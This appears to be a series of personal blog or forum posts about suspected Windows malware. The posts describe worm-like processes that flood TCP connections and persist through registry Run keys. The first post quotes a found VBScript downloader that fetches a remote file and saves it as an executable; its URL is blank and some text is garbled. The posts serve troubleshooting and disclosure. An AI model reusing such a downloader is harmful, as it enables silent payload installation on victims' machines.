I just found a virus like file under c:\, the content is: Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","",0xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "C\1.exe",2

This worm created a lot of TCP connection and affected normal internet usage. It will spawn another process once it is killed. Well, I can suspend it and then google a solution.

sddriver.exe seems to be a worm, it initialed a lot of connections (can be seen in TCPView.exe) and affected normal use of web browser. It is found in the following registry entries, but the file is not found in disk.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunCall

Firefox displays blank page for many urls

Today when I am surfing internet, suddenly Firefox can't open new pages correctly — just be blank. After launching TCPView.exe I found rundll.exe (PID=4848) making lots of connection attempts, much like a virus/worm, so I killed it and firefox resumed

wishs.exe — virus or worm?

Wishs.exe is found in the following registry[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]Microsoft=wishs.exe[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]Microsoft=wishs.exe[HKEY_USERS\.DEFAULT\Software\ASProtect]Microsoft=wishs.exe

